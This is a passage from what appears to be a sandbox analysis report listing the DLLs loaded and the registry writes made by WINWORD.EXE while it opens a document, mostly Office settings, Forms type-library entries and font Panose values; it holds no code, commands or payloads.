c:\windows\system32\vssapi.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\clusapi.dll
c:\windows\system32\cryptdll.dll
c:\windows\system32\xolehlp.dll
c:\windows\system32\version.dll
c:\windows\system32\resutils.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\authz.dll
c:\windows\system32\virtdisk.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vss_ps.dll
c:\windows\system32\samlib.dll
c:\windows\system32\es.dll
c:\windows\system32\propsys.dll
c:\windows\system32\catsrvut.dll
c:\windows\system32\mfcsubs.dll

Registry activity

Total events
2146
Read events
1362
Write events
783
Delete events
1

Modification events

PID
Process
Operation
Key
Name
Value
2716
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
b*"
622A22009C0A0000010000000000000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1321992222
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992336
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992337
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
9C0A0000E0DB8D8AC020D50100000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
),"
292C22009C0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
a-"
612D22009C0A00000600000001000000DE00000002000000CE0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0065006600650033006500630065003100300031003700300031003500350062003800330037006600660065003700660038006200350066003500310061003900620066003600620033003700330030003500660031006200630065006600320066003700610061006600350064003500340034003200650035006500610039002E0064006F006300000000000000
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992338
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1321992339
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992193
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992193
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992194
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992194
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1321992195
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1321992195
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1321992202
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1321992203
2716
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1321992196
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{805D23D3-2B07-48FD-9E5F-5A01E20C521E}
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\135EDD
135EDD
040000009C0A00006600000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0065006600650033006500630065003100300031003700300031003500350062003800330037006600660065003700660038006200350066003500310061003900620066003600620033003700330030003500660031006200630065006600320066003700610061006600350064003500340034003200650035006500610039002E0064006F0063004400000065006600650033006500630065003100300031003700300031003500350062003800330037006600660065003700660038006200350066003500310061003900620066003600620033003700330030003500660031006200630065006600320066003700610061006600350064003500340034003200650035006500610039002E0064006F006300000000000100000000000000D2B4868AC020D501DD5E1300DD5E130000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{7F4F8DFD-69EF-4B8B-BAE7-B17EF19F4ADC}\2.0
Microsoft Forms 2.0 Object Library
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{7F4F8DFD-69EF-4B8B-BAE7-B17EF19F4ADC}\2.0\FLAGS
6
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{7F4F8DFD-69EF-4B8B-BAE7-B17EF19F4ADC}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{7F4F8DFD-69EF-4B8B-BAE7-B17EF19F4ADC}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\VBE
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
2716
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Courier New
02070309020205020404
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Symbol
05050102010706020507
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings
05000000000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Mincho
02020609040205080304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Batang
02030600000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun
02010600030101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Gothic
020B0609070205080204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Dotum
020B0600000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimHei
02010609060101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU
02020509000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gulim
020B0600000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century
02040604050505020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Angsana New
02020603050405020304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cordia New
020B0304020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mangal
02040503050203030202
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Latha
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sylfaen
010A0502050306030303
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vrinda
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Raavi
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shruti
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gautami
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tunga
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Estrangelo Edessa
03080600000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
02040503050406030204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Unicode MS
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tahoma
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Marlett
00000000000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Batang
02030600000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BatangChe
02030609000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@BatangChe
02030609000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gungsuh
02030600000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gungsuh
02030600000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GungsuhChe
02030609000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GungsuhChe
02030609000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DaunPenh
01010101010101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DokChampa
020B0604020202020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Euphemia
020B0503040102020104
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vani
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gulim
020B0600000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GulimChe
020B0609000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GulimChe
020B0609000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Dotum
020B0600000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DotumChe
020B0609000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DotumChe
020B0609000101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Impact
020B0806030902050204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Iskoola Pota
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kalinga
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kartika
02020503030404060203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Khmer UI
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lao UI
020B0502040204020203
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Console
020B0609040504020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic
020B0503020000020004
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Malgun Gothic
020B0503020000020004
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo UI
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo UI
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Himalaya
01010100010101010101
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft JhengHei
020B0604030504040204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei
020B0503020204020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft YaHei
020B0503020204020204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU
02020509000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU-ExtB
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU-ExtB
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU-ExtB
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU-ExtB
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS-ExtB
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS-ExtB
02020500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mongolian Baiti
03000500000000000000
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Gothic
020B0609070205080204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PGothic
020B0600070205080204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PGothic
020B0600070205080204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS UI Gothic
020B0600070205080204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS UI Gothic
020B0600070205080204
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Mincho
02020609040205080304
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PMincho
02020600040205080304
2716
